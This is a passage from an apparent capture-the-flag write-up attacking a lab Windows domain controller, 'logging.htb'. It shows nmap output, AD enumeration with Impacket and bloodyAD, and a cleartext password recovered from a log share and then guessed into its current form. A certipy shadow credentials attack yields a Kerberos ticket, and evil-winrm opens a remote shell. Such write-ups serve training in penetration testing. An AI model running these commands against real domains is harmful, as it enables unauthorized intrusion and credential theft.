| 5Gf3oJCRiDDGC70qCe5lQbnETp5z/VXxFwY5N6o40w4spe5/dpbBBouPlverLMnL
| ggLa2vSnOoig+rkgq/rtbzCRNsHNwjevvroWF0z9HoMYeiRmdzWizXYplp6yJ0na
| 2sQrQzc1nw0EB7Tz2Xpy0oZinrpyPWPaebLY/GoUQArzts6wJhYz7BpbdxFmAczV
| VEEZwIPWlVTVfoPN6ybmhZlBdGui27W/2MRnXCy4KH1KRV699xGp0Qr/Q9erU0WP
| zRpq333BIbPxpFCqCISXz7lLt8aPsFHVFIWbPxcOQKKQlbHiQ4qVXmWgoX5LWwGA
| W3lntXUi9xf6JwdVDbgZsH5OWg4AV2giU6TEK5JjGeRsINqQCgYndXKQCqp7t4zR
| AbML7iOTse0IauL5X6UZBbJJ/V7XIkE6WDoPFFpJe2sXxg98PieDxT9914JRmNx8
| 9CFyLB6fNC6nzgq8+Wa/5/rXhjIS7pSaYMs8umNigTcFJ2HJC0zOUEMqkGpOxEH/
| Zm+AYG+tg0f3xdFqr0MdcbUJ7TPUMheEqLEgdCsPWFbIVlsPZsXW8hjWbcEq90Hn
| POF4wwAV8i3dVFrslgw7SnFZOfY=
|_-----END CERTIFICATE-----
|_ssl-date: 2026-04-19T10:14:14+00:00; +6h59m48s from scanner time.
| tls-alpn:
| h2
|_ http/1.1
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
15518/tcp closed unknown reset ttl 127
25677/tcp closed unknown reset ttl 127
32678/tcp closed unknown reset ttl 127
32864/tcp closed unknown reset ttl 127
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47363/tcp closed unknown reset ttl 127
49664/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49686/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49691/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49713/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49719/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49746/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49776/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
55515/tcp closed unknown reset ttl 127
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2026-04-19T10:14:03
|_ start_date: N/A
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 60761/tcp): CLEAN (Couldn't connect)
| Check 2 (port 50348/tcp): CLEAN (Couldn't connect)
| Check 3 (port 33017/udp): CLEAN (Timeout)
| Check 4 (port 59572/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 6h59m47s, deviation: 0s, median: 6h59m47s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
We can see from the scan several open ports from the common AD services: SMB,LDAP,RPC,Kerberos, WinRM including the presence of a CA indicating ADCS, as well as several uncommon services including: IIS, WSUS
Visiting the sebserver on port 80 we’re just greeted with the default microsoft IIS page. I was unable to find anything when fuzzing for subdomains through vhost fuzzing. The same applies to fuzzing directories.
For the following sections I’ll get myself a TGT from our assumed breach user and use that to authenticate.
1
2
3
4
5
$ getTGT.py 'logging.htb/wallace.everette:Welcome2026@'
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in wallace.everette.ccache
$ export KRB5CCNAME=wallace.everette.ccache
Let’s start by enumerating the domain.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ GetADUsers.py -k -no-pass logging.htb/ -all
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[*] Querying DC01 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator 2026-04-16 10:41:53.344270 2026-04-19 06:31:32.086826
Guest <never> <never>
krbtgt 2026-04-16 10:47:15.391024 <never>
svc_recovery 2026-04-16 19:09:49.415051 <never>
jaylee.clifton 2026-04-16 19:09:49.774441 2026-04-19 06:32:15.867776
monique.chip 2026-04-16 19:09:49.949785 <never>
kyson.abel 2026-04-16 19:09:50.071726 <never>
fable.milford 2026-04-16 19:09:50.149426 <never>
wellington.kylan 2026-04-16 19:09:50.227559 <never>
serina.philander 2026-04-16 19:09:50.383931 <never>
wallace.everette 2026-04-16 19:09:50.493177 2026-04-19 06:25:30.305323
toby.brynleigh 2026-04-16 19:09:50.571309 2026-04-19 04:12:53.789676
1
2
3
4
5
6
7
8
$ GetADComputers.py -k -no-pass logging.htb/
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies
[*] Getting machine hostname
[*] Querying DC01 for information about domain.
SAM AcctName DNS Hostname OS Version OS
--------------- ----------------------------------- --------------- --------------------
DC01$ DC01.logging.htb 10.0 (17763) Windows Server 2019 Standard
1
2
3
4
5
6
7
8
$ CheckLDAPStatus.py -domain logging.htb -dc-ip 10.129.28.191
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies
[*] Targeted domain: logging.htb
[*] Found 1 domain controller(s) in logging.htb
Hostname: dc01.logging.htb
> LDAP Signing Required: False
> LDAPS Channel Binding Status: Never
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
$ bloodyAD -H dc01.logging.htb -k -d logging.htb get search --filter '(objectClass=Group)' --attr member
distinguishedName: CN=Administrators,CN=Builtin,DC=logging,DC=htb
member: CN=toby.brynleigh,CN=Users,DC=logging,DC=htb; CN=Domain Admins,CN=Users,DC=logging,DC=htb; CN=Enterprise Admins,CN=Users,DC=logging,DC=htb; CN=Administrator,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Users,CN=Builtin,DC=logging,DC=htb
member: CN=Domain Users,CN=Users,DC=logging,DC=htb; CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=logging,DC=htb; CN=S-1-5-4,CN=ForeignSecurityPrincipals,DC=logging,DC=htb
distinguishedName: CN=Guests,CN=Builtin,DC=logging,DC=htb
member: CN=Domain Guests,CN=Users,DC=logging,DC=htb; CN=Guest,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Print Operators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Backup Operators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Replicator,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Remote Desktop Users,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Network Configuration Operators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Performance Monitor Users,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Performance Log Users,CN=Builtin,DC=logging,DC=htb
member: CN=jaylee.clifton,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Distributed COM Users,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=IIS_IUSRS,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Cryptographic Operators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Event Log Readers,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Certificate Service DCOM Access,CN=Builtin,DC=logging,DC=htb
member: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=logging,DC=htb
distinguishedName: CN=RDS Remote Access Servers,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=RDS Endpoint Servers,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=RDS Management Servers,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Hyper-V Administrators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Access Control Assistance Operators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Remote Management Users,CN=Builtin,DC=logging,DC=htb
member: CN=msa_health,CN=Managed Service Accounts,DC=logging,DC=htb
distinguishedName: CN=Storage Replica Administrators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Domain Computers,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Domain Controllers,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Schema Admins,CN=Users,DC=logging,DC=htb
member: CN=Administrator,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Enterprise Admins,CN=Users,DC=logging,DC=htb
member: CN=Administrator,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Cert Publishers,CN=Users,DC=logging,DC=htb
member: CN=DC01,OU=Domain Controllers,DC=logging,DC=htb
distinguishedName: CN=Domain Admins,CN=Users,DC=logging,DC=htb
member: CN=toby.brynleigh,CN=Users,DC=logging,DC=htb; CN=Administrator,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Domain Users,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Domain Guests,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=logging,DC=htb
member: CN=Administrator,CN=Users,DC=logging,DC=htb
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Server Operators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Account Operators,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=logging,DC=htb
member: CN=DC01,OU=Domain Controllers,DC=logging,DC=htb; CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=logging,DC=htb
distinguishedName: CN=Incoming Forest Trust Builders,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Windows Authorization Access Group,CN=Builtin,DC=logging,DC=htb
member: CN=S-1-5-9,CN=ForeignSecurityPrincipals,DC=logging,DC=htb
distinguishedName: CN=Terminal Server License Servers,CN=Builtin,DC=logging,DC=htb
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=logging,DC=htb
member: CN=Read-only Domain Controllers,CN=Users,DC=logging,DC=htb; CN=Group Policy Creator Owners,CN=Users,DC=logging,DC=htb; CN=Domain Admins,CN=Users,DC=logging,DC=htb; CN=Cert Publishers,CN=Users,DC=logging,DC=htb; CN=Enterprise Admins,CN=Users,DC=logging,DC=htb; CN=Schema Admins,CN=Users,DC=logging,DC=htb; CN=Domain Controllers,CN=Users,DC=logging,DC=htb; CN=krbtgt,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Read-only Domain Controllers,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Protected Users,CN=Users,DC=logging,DC=htb
member: CN=svc_recovery,CN=Users,DC=logging,DC=htb; CN=Administrator,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Key Admins,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Enterprise Key Admins,CN=Users,DC=logging,DC=htb
distinguishedName: CN=DnsAdmins,CN=Users,DC=logging,DC=htb
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=logging,DC=htb
distinguishedName: CN=Emergency Recovery,CN=Users,DC=logging,DC=htb
member: CN=svc_recovery,CN=Users,DC=logging,DC=htb
distinguishedName: CN=IT,CN=Users,DC=logging,DC=htb
member: CN=jaylee.clifton,CN=Users,DC=logging,DC=htb
distinguishedName: CN=HR,CN=Users,DC=logging,DC=htb
member: CN=wellington.kylan,CN=Users,DC=logging,DC=htb
distinguishedName: CN=WSUS Administrators,CN=Users,DC=logging,DC=htb
distinguishedName: CN=WSUS Reporters,CN=Users,DC=logging,DC=htb
1
2
3
$ bloodyAD -H dc01.logging.htb -k -d logging.htb get search --filter '(objectClass=msDS-GroupManagedServiceAccount)' --attr distinguishedName
distinguishedName: CN=msa_health,CN=Managed Service Accounts,DC=logging,DC=htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
$ certipy-ad find -k -no-pass -target DC01.logging.htb -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: DC01.logging.htb.
[!] Use -debug to print a stacktrace
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'logging-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'logging-DC01-CA'
[*] Checking web enrollment for CA 'logging-DC01-CA' @ 'DC01.logging.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260419064303_Certipy.txt'
[*] Wrote text output to '20260419064303_Certipy.txt'
[*] Saving JSON output to '20260419064303_Certipy.json'
[*] Wrote JSON output to '20260419064303_Certipy.json'
$ cat 20260419064303_Certipy.txt
Certificate Authorities
0
CA Name : logging-DC01-CA
DNS Name : DC01.logging.htb
Certificate Subject : CN=logging-DC01-CA, DC=logging, DC=htb
Certificate Serial Number : 196621CCC95B9C904E63B58E449ABC04
Certificate Validity Start : 2026-04-17 03:20:00+00:00
Certificate Validity End : 2126-04-17 03:30:00+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : LOGGING.HTB\Administrators
Access Rights
ManageCa : LOGGING.HTB\Administrators
LOGGING.HTB\Domain Admins
LOGGING.HTB\Enterprise Admins
ManageCertificates : LOGGING.HTB\Administrators
LOGGING.HTB\Domain Admins
LOGGING.HTB\Enterprise Admins
Enroll : LOGGING.HTB\Authenticated Users
Certificate Templates : [!] Could not find any certificate templates
1
2
3
4
5
6
7
8
9
10
11
12
$ smbclient.py -k -no-pass DC01.logging.htb
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# shares
ADMIN$
C$
IPC$
Logs
NETLOGON
SYSVOL
WSUSTemp
The most interesting object I have found so far seems to be the msa_health$ service account along with the svc_recovery and Emergency Recovery groups.
Let’s take a look at the ACLs for msa_health$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
$ bloodyAD -H dc01.logging.htb -k -d logging.htb get object 'msa_health$' --resolve-sd
distinguishedName: CN=msa_health,CN=Managed Service Accounts,DC=logging,DC=htb
accountExpires: 9999-12-31 23:59:59.999999+00:00
badPasswordTime: 1601-01-01 00:00:00+00:00
badPwdCount: 0
cn: msa_health
codePage: 0
countryCode: 0
dNSHostName: msa_health.logging.htb
dSCorePropagationData: 2026-04-16 23:36:35+00:00
instanceType: 4
isCriticalSystemObject: False
lastLogoff: 1601-01-01 00:00:00+00:00
lastLogon: 1601-01-01 00:00:00+00:00
localPolicyFlags: 0
logonCount: 0
memberOf: CN=Remote Management Users,CN=Builtin,DC=logging,DC=htb
msDS-ManagedPasswordId: AQAAAEtEU0sCAAAAbAEAAAIAAAABAAAABtA80N8pE5wgJbudpD4KkgAAAAAYAAAAGAAAAGwAbwBnAGcAaQBuAGcALgBoAHQAYgAAAGwAbwBnAGcAaQBuAGcALgBoAHQAYgAAAA==
msDS-ManagedPasswordInterval: 30
msDS-SupportedEncryptionTypes: 28
nTSecurityDescriptor.Owner: Domain Admins
nTSecurityDescriptor.Control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
nTSecurityDescriptor.ACL.0.Type: == DENIED_OBJECT ==
nTSecurityDescriptor.ACL.0.Trustee: EVERYONE
nTSecurityDescriptor.ACL.0.Right: CONTROL_ACCESS
nTSecurityDescriptor.ACL.0.ObjectType: User-Force-Change-Password
nTSecurityDescriptor.ACL.1.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.1.Trustee: Cert Publishers
nTSecurityDescriptor.ACL.1.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.1.ObjectType: X509-Cert
nTSecurityDescriptor.ACL.2.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.2.Trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
nTSecurityDescriptor.ACL.2.Right: READ_PROP
nTSecurityDescriptor.ACL.2.ObjectType: Token-Groups-Global-And-Universal
nTSecurityDescriptor.ACL.3.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.3.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.3.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.3.ObjectType: Service-Principal-Name; DNS-Host-Name
+ nTSecurityDescriptor.ACL.4.Type: == ALLOWED_OBJECT ==
+ nTSecurityDescriptor.ACL.4.Trustee: EVERYONE
+ nTSecurityDescriptor.ACL.4.Right: READ_PROP
+ nTSecurityDescriptor.ACL.4.ObjectType: ms-DS-ManagedPassword
nTSecurityDescriptor.ACL.5.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.5.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.5.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.5.ObjectType: Personal-Information (property set)
+ nTSecurityDescriptor.ACL.6.Type: == ALLOWED ==
+ nTSecurityDescriptor.ACL.6.Trustee: svc_recovery
+ nTSecurityDescriptor.ACL.6.Right: GENERIC_WRITE|READ_PROP|LIST_CHILD
+ nTSecurityDescriptor.ACL.6.ObjectType: Self
nTSecurityDescriptor.ACL.7.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.7.Trustee: ACCOUNT_OPERATORS; LOCAL_SYSTEM; Domain Admins
nTSecurityDescriptor.ACL.7.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.7.ObjectType: Self
nTSecurityDescriptor.ACL.8.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.8.Trustee: AUTHENTICATED_USERS
nTSecurityDescriptor.ACL.8.Right: GENERIC_READ
nTSecurityDescriptor.ACL.8.ObjectType: Self
nTSecurityDescriptor.ACL.9.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.9.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.9.Right: READ_PROP
nTSecurityDescriptor.ACL.9.ObjectType: Logon-Information (property set); Remote-Access-Information (property set); General-Information (property set); Account-Restrictions (property set); Group-Membership (property set)
nTSecurityDescriptor.ACL.9.InheritedObjectType: User; inetOrgPerson
nTSecurityDescriptor.ACL.9.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.10.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.10.Trustee: Enterprise Key Admins; Key Admins
nTSecurityDescriptor.ACL.10.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.10.ObjectType: ms-DS-Key-Credential-Link
nTSecurityDescriptor.ACL.10.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.11.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.11.Trustee: PRINCIPAL_SELF; CREATOR_OWNER
nTSecurityDescriptor.ACL.11.Right: WRITE_VALIDATED
nTSecurityDescriptor.ACL.11.ObjectType: DS-Validated-Write-Computer
nTSecurityDescriptor.ACL.11.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.11.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.12.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.12.Trustee: ENTERPRISE_DOMAIN_CONTROLLERS
nTSecurityDescriptor.ACL.12.Right: READ_PROP
nTSecurityDescriptor.ACL.12.ObjectType: Token-Groups
nTSecurityDescriptor.ACL.12.InheritedObjectType: Group; User; Computer
nTSecurityDescriptor.ACL.12.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.13.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.13.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.13.Right: WRITE_PROP
nTSecurityDescriptor.ACL.13.ObjectType: ms-TPM-Tpm-Information-For-Computer
nTSecurityDescriptor.ACL.13.InheritedObjectType: Computer
nTSecurityDescriptor.ACL.13.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.14.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.14.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.14.Right: GENERIC_READ
nTSecurityDescriptor.ACL.14.ObjectType: Self
nTSecurityDescriptor.ACL.14.InheritedObjectType: User; inetOrgPerson; Group
nTSecurityDescriptor.ACL.14.Flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
nTSecurityDescriptor.ACL.15.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.15.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.15.Right: WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.15.ObjectType: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
nTSecurityDescriptor.ACL.15.Flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
nTSecurityDescriptor.ACL.16.Type: == ALLOWED_OBJECT ==
nTSecurityDescriptor.ACL.16.Trustee: PRINCIPAL_SELF
nTSecurityDescriptor.ACL.16.Right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
nTSecurityDescriptor.ACL.16.ObjectType: Private-Information (property set)
nTSecurityDescriptor.ACL.16.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.17.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.17.Trustee: Enterprise Admins
nTSecurityDescriptor.ACL.17.Right: GENERIC_ALL
nTSecurityDescriptor.ACL.17.ObjectType: Self
nTSecurityDescriptor.ACL.17.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.18.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.18.Trustee: ALIAS_PREW2KCOMPACC
nTSecurityDescriptor.ACL.18.Right: LIST_CHILD
nTSecurityDescriptor.ACL.18.ObjectType: Self
nTSecurityDescriptor.ACL.18.Flags: CONTAINER_INHERIT; INHERITED
nTSecurityDescriptor.ACL.19.Type: == ALLOWED ==
nTSecurityDescriptor.ACL.19.Trustee: BUILTIN_ADMINISTRATORS
nTSecurityDescriptor.ACL.19.Right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
nTSecurityDescriptor.ACL.19.ObjectType: Self
nTSecurityDescriptor.ACL.19.Flags: CONTAINER_INHERIT; INHERITED
name: msa_health
objectCategory: CN=ms-DS-Group-Managed-Service-Account,CN=Schema,CN=Configuration,DC=logging,DC=htb
objectClass: top; person; organizationalPerson; user; computer; msDS-GroupManagedServiceAccount
objectGUID: 22d835ba-1d5a-4a18-bd09-56225643b724
objectSid: S-1-5-21-4020823815-2796529489-1682170552-2113
primaryGroupID: 515
pwdLastSet: 2026-04-16 23:36:06.647754+00:00
sAMAccountName: msa_health$
sAMAccountType: 805306369
uSNChanged: 24616
uSNCreated: 24609
userAccountControl: WORKSTATION_TRUST_ACCOUNT
whenChanged: 2026-04-16 23:36:35+00:00
whenCreated: 2026-04-16 23:36:06+00:00
Although it may look like everyone can read the msDS-ManagedPassword, in reality only users with GENERIC ALL over the machine can read this property, so our target shifts over to svc_recovery.
Looking back at our shares we can find 2 interesting ones: Logs and WSUSTemp, WSUSTemp seems like the most appealing right now because it opens up the possibility for WSUS attacks, however we don’t have permissions on this share, so instead we take a look at the Logs share.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# use WSUSTemp
[-] SMB SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
# use Logs
# ls
drw-rw-rw- 0 Thu Apr 16 19:10:09 2026 .
drw-rw-rw- 0 Thu Apr 16 19:10:09 2026 ..
-rw-rw-rw- 1294 Thu Apr 16 19:10:09 2026 Audit_Heartbeat.log
-rw-rw-rw- 8488 Thu Apr 16 19:10:09 2026 IdentitySync_Trace_20260219.log
-rw-rw-rw- 468 Thu Apr 16 19:10:09 2026 Service_State.log
-rw-rw-rw- 1170 Thu Apr 16 19:10:09 2026 TaskMonitor.log
# mget *
[*] Downloading Audit_Heartbeat.log
[*] Downloading IdentitySync_Trace_20260219.log
[*] Downloading Service_State.log
[*] Downloading TaskMonitor.log
Taking a look at each log, the most interesting one seems to be the IdentitySync_Trace_20260219.log where we can find a cleartext password for the user account svc_recovery.
1
2
3
$ grep -ni 'svc_recovery' IdentitySync_Trace_20260219.log
32:[2026-02-09 03:00:03.125] [PID:4102] [Thread:04] VERBOSE - ConnectionContext Dump: { Domain: "logging.htb", Server: "DC01", SSL: "False", BindUser: "LOGGING\svc_recovery", BindPass: "Em3rg3ncyPa$$2025", Timeout: 30 }
41:[2026-02-19 03:00:03.510] [PID:4102] [Thread:12] WARN - Connectivity failed for logging\svc_recovery. Checking alternate Domain Controller...
I’ve tried this password against svc_recovery, however it didn’t work as expected, as it’s no longer the year 2025, one may suspect to update the year to 2026 which is in the end what worked.
for the following sections I’ll get myself a TGT as svc_recovery to use for authentication
1
2
3
4
5
$ getTGT.py logging.htb/svc_recovery:'Em3rg3ncyPa$$2026'
Impacket v0.14.0.dev0+20260406.132546.b12b2f3b - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in svc_recovery.ccache
$ export KRB5CCNAME=svc_recovery.ccache
Now that we have svc_recovery I’ll grab msa_health$’s TGT through a shadow credentials attack
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ certipy-ad shadow add -k -no-pass -target DC01.logging.htb -account 'msa_health$'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[!] DC host (-dc-host) not specified and Kerberos authentication is used. This might fail
[!] DNS resolution failed: The DNS query name does not exist: DC01.logging.htb.
[!] Use -debug to print a stacktrace
[!] DNS resolution failed: The DNS query name does not exist: LOGGING.HTB.
[!] Use -debug to print a stacktrace
[*] Targeting user 'msa_health$'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'b2a0a7d82a184a60ad45314647dc2fa3'
[*] Adding Key Credential with device ID 'b2a0a7d82a184a60ad45314647dc2fa3' to the Key Credentials for 'msa_health$'
[*] Successfully added Key Credential with device ID 'b2a0a7d82a184a60ad45314647dc2fa3' to the Key Credentials for 'msa_health$'
[*] Saving certificate and private key to 'msa_health.pfx'
[*] Saved certificate and private key to 'msa_health.pfx'
$ gettgtpkinit.py -cert-pfx msa_health.pfx 'logging.htb/msa_health' msa_health.ccache
2026-04-19 08:25:29,037 minikerberos INFO Loading certificate and key from file
2026-04-19 08:25:29,197 minikerberos INFO Requesting TGT
2026-04-19 08:25:29,798 minikerberos INFO AS-REP encryption key (you might need this later):
2026-04-19 08:25:29,798 minikerberos INFO a9948404a43cf046703d230c84e858ec9e92568b2c6db575846de3b35d14b793
2026-04-19 08:25:29,804 minikerberos INFO Saved TGT to file
$ export KRB5CCNAME=msa_health.ccache
Since we know that msa_health is a member of Remote Management Users we’re able to remote onto the machine.
1
2
3
4
5
6
7
8
9
10
$ evil-winrm -i dc01.logging.htb -r logging.htb
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc` for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\msa_health$\Documents>
Looking at our Documents folder we find a script called monitor.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
*Evil-WinRM* PS C:\Users\msa_health$\Documents> type monitor.ps1
<#
.SYNOPSIS
Monitors the status of the "UpdateChecker Agent" scheduled task.
Uses COM interface to avoid CIM/WMI permission issues.
#>
